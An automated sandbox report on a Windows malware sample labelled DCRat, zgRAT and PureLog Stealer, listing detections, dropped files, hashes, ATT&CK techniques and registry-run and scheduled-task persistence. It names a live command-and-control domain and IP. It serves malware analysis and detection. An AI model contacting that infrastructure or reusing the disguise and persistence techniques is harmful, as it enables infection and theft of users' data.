                              Source: C:\Windows\System32\schtasks.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\System32\schtasks.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara match; File source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: 4ra1Fo2Zql.exe PID: 5688, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7096, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7716, type: MEMORYSTR
                              Source: Yara match; File source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara match; File source: C:\Users\user\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match; File source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara match; File source: C:\Users\user\RuntimeBroker.exe, type: DROPPED

                              Remote Access Functionality

                              Source: Yara match; File source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: 4ra1Fo2Zql.exe PID: 5688, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7096, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7716, type: MEMORYSTR
                              Source: Yara match; File source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara match; File source: C:\Users\user\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match; File source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara match; File source: C:\Users\user\RuntimeBroker.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                              Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 34 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 241 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 243 Masquerading | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              Behavior Graph ID: 1501437, Sample: 4ra1Fo2Zql.exe, Startdate: 29/08/2024, Architecture: WINDOWS, Score: 100

                              Source | Detection | Scanner | Label | Link
                              4ra1Fo2Zql.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              4ra1Fo2Zql.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              4ra1Fo2Zql.exe | 100% | Joe Sandbox ML | |
                              Source | Detection | Scanner | Label | Link
                              C:\Users\user\Desktop\VTXhBlNT.log | 100% | Avira | TR/PSW.Agent.qngqt |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\Desktop\MjzRNvWG.log | 100% | Avira | TR/PSW.Agent.qngqt |
                              C:\Users\user\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\Desktop\sTRlxExW.log | 100% | Avira | HEUR/AGEN.1300079 |
                              C:\Users\user\Desktop\CAgBdTQY.log | 100% | Avira | HEUR/AGEN.1300079 |
                              C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat | 100% | Avira | BAT/Delbat.C |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\AppData\Local\Temp\IZdub348jc.bat | 100% | Avira | BAT/Delbat.C |
                              C:\Users\user\Desktop\VTXhBlNT.log | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\MjzRNvWG.log | 100% | Joe Sandbox ML | |
                              C:\Users\user\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\cPGganVc.log | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\VLoPWCmN.log | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\CAgBdTQY.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\MjzRNvWG.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\VLoPWCmN.log | 8% | ReversingLabs | |
                              C:\Users\user\Desktop\VTXhBlNT.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\cPGganVc.log | 8% | ReversingLabs | |
                              C:\Users\user\Desktop\fuHfGerv.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                              C:\Users\user\Desktop\gwaXxxDZ.log | 25% | ReversingLabs | |
                              C:\Users\user\Desktop\myawJPbK.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                              C:\Users\user\Desktop\sTRlxExW.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\xxMkqOtN.log | 25% | ReversingLabs | |
                              C:\Users\user\RuntimeBroker.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              No Antivirus matches
                              No Antivirus matches
Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://621287cm.n9shteam2.top/ | 100% | Avira URL Cloud | malware
http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php | 100% | Avira URL Cloud | malware
http://621287cm.n9shteam2.top | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
621287cm.n9shteam2.top | 80.211.144.156 | true | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://621287cm.n9shteam2.top/ | GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://621287cm.n9shteam2.top | GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
80.211.144.156 | 621287cm.n9shteam2.top | Italy | 31034 | ARUBA-ASNIT | true
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1501437
                                Start date and time:2024-08-29 23:01:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 18s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:56
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:4ra1Fo2Zql.exe
                                renamed because original name is a hash value
                                Original Sample Name:1b7d99034e439d9f034c9969f88f7b74.exe
                                Detection:MAL
                                Classification:mal100.spre.troj.expl.evad.winEXE@54/48@1/1
                                EGA Information:
                                • Successful, ratio: 8.3%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target 4ra1Fo2Zql.exe, PID 7384 because it is empty
                                • Execution Graph export aborted for target 4ra1Fo2Zql.exe, PID 7420 because it is empty
                                • Execution Graph export aborted for target GrVEPTmsoNTbY.exe, PID 4124 because it is empty
                                • Execution Graph export aborted for target GrVEPTmsoNTbY.exe, PID 7096 because it is empty
                                • Execution Graph export aborted for target GrVEPTmsoNTbY.exe, PID 7716 because it is empty
                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 7492 because it is empty
                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 7528 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 7452 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 7476 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 7752 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 8096 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: 4ra1Fo2Zql.exe
Time | Type | Description
17:02:11 | API Interceptor | 1x Sleep call for process: GrVEPTmsoNTbY.exe modified
23:01:57 | Task Scheduler | Run new task: GrVEPTmsoNTbY path: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
23:01:57 | Task Scheduler | Run new task: GrVEPTmsoNTbYG path: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
23:01:59 | Task Scheduler | Run new task: 4ra1Fo2Zql path: "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
23:01:59 | Task Scheduler | Run new task: 4ra1Fo2Zql4 path: "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
23:01:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
23:02:00 | Task Scheduler | Run new task: csrss path: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
23:02:00 | Task Scheduler | Run new task: csrssc path: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
23:02:00 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Users\user\RuntimeBroker.exe"
23:02:00 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Users\user\RuntimeBroker.exe"
23:02:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
23:02:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\user\RuntimeBroker.exe"
23:02:24 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
23:02:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
23:02:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
23:02:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\user\RuntimeBroker.exe"
23:02:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
23:03:06 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
23:03:16 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
23:03:24 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\user\RuntimeBroker.exe"
23:03:32 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
23:03:49 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
23:03:58 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
80.211.144.156 | BUKHuBek8M.exe | malicious | DCRat, PureLog Stealer, zgRAT | 426314cm.n9sh.top/vmupdateAuthsqlDbAsyncTrackDlecentralDownloads.php
80.211.144.156 | foIdlOzWvH.exe | malicious | DCRat, PureLog Stealer, zgRAT | 921773cm.n9sh.top/providerExternalimageVideojsPacketprocessorDefaultDbLinux.php
80.211.144.156 | 3O5Uh9S6wK.exe | malicious | DCRat, PureLog Stealer, zgRAT | 951499cm.nyashtech.top/sqlcentralUploads.php
80.211.144.156 | trkfmve.exe | malicious | DCRat, PureLog Stealer, zgRAT | 966193cm.n9shka.top/Multilinux.php
80.211.144.156 | bfderfg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 951499cm.nyashtech.top/PollGeoDbwordpressTemporary/722944f89091ce5d9b1c5fbdfd00568555f67a8aa399d5400d05a2a7b07fcbcd263346663ea3568b
80.211.144.156 | iolZQ9869U.exe | malicious | DCRat, PureLog Stealer, zgRAT | 438772cm.n9shka.top/javascriptPollCpuLinuxWindowsgenerator.php
80.211.144.156 | 8mBGM9uk53.exe | malicious | DCRat, PureLog Stealer, zgRAT | 951499cm.nyashtech.top/sqlcentralUploads.php
80.211.144.156 | jZrY9owO7A.exe | malicious | DCRat, PureLog Stealer, zgRAT | 621196cl.nyashtop.top/PythonPacketProcessapidbwindowsUniversalcdn.php
80.211.144.156 | Componentsession.exe | malicious | DCRat, PureLog Stealer, zgRAT | 664732cm.nyashka.top/Provider_CpuUpdateprocessorLongpollwindowstesttrackCdn.php
80.211.144.156 | -#U00bc).exe | malicious | DCRat, PureLog Stealer, zgRAT | 664732cm.nyashka.top/Provider_CpuUpdateprocessorLongpollwindowstesttrackCdn.php
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ARUBA-ASNIT | bintoday1.exe | malicious | FormBook | 62.149.128.40
ARUBA-ASNIT | Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe | malicious | AgentTesla | 62.149.156.218
ARUBA-ASNIT | BUKHuBek8M.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | https://urlsand.esvalabs.com/?u=https%3A%2F%2Flinkin.bio%2Falbatros&e=606d87ee&h=dea68a16&f=y&p=y | malicious | HTMLPhisher | 95.110.136.136
ARUBA-ASNIT | foIdlOzWvH.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | 3O5Uh9S6wK.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | trkfmve.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | bfderfg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | iolZQ9869U.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | 8mBGM9uk53.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\CAgBdTQY.log | ugRGgCJhQl.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | eCGKhYZtgx.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | czcgyt.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | trkfmve.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | iolZQ9869U.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | 2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | jZrY9owO7A.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | Componentsession.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | -#U00bc).exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CAgBdTQY.log | Loader.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with very long lines (742), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):742
                                                    Entropy (8bit):5.902673486354985
                                                    Encrypted:false
                                                    SSDEEP:12:blB5iyrgpY3Nzu1j7Poh00Yky+YFKlo19JwOuJMKtA/SUSlntHqzjIn9er52wy+D:L8igk63mYky+YFUwuJJa/aBRAUn9lwpD
                                                    MD5:28C1B8E252687E8B1959D8B6398861D0
                                                    SHA1:5808B585406A2F4E88E3B3832352990B5EC3B3C1
                                                    SHA-256:40A7070779916B047FC45F664804E0831F7963B7F98CA0D46B32A57F15C90310
                                                    SHA-512:EA7FECB5981BF22FB1CE03AF1B0DE1CD574211A3AADEA08993B127BBC95BFF2E9B9665E402E141269C62FA6E791184BD60325BA8901AB94E41A8D2AC9A0174F4
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):202
                                                    Entropy (8bit):5.73787963507525
                                                    Encrypted:false
                                                    SSDEEP:3:RxW3/A4cTlG6vxIpnpjPhzizNNc+FDoM90R3BDxykOQxLEElfSrPtn:7W3I4cpG62zhzykIcM90R3BD4SKOSLt
                                                    MD5:5E55154F678D614A716DCE1117B9B97D
                                                    SHA1:29C862CCEBFBDBB78BE83B998CE47F14844C3D98
                                                    SHA-256:A9A8FFA9D701EC7CA0AA6A53514555F556E4733F7A2BB4744D76C3A077314C33
                                                    SHA-512:6ECFE3394CE7EDB1707E7B2F48D42929E98A9F09F3CE1E6B0E614557BCCF1C82B5FFDC7BF7DA8FA62F568809572706513B5ACF36B1E6654A16FF210FB336BA12
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1168
                                                    Entropy (8bit):4.448520842480604
                                                    Encrypted:false
                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                    Malicious:false
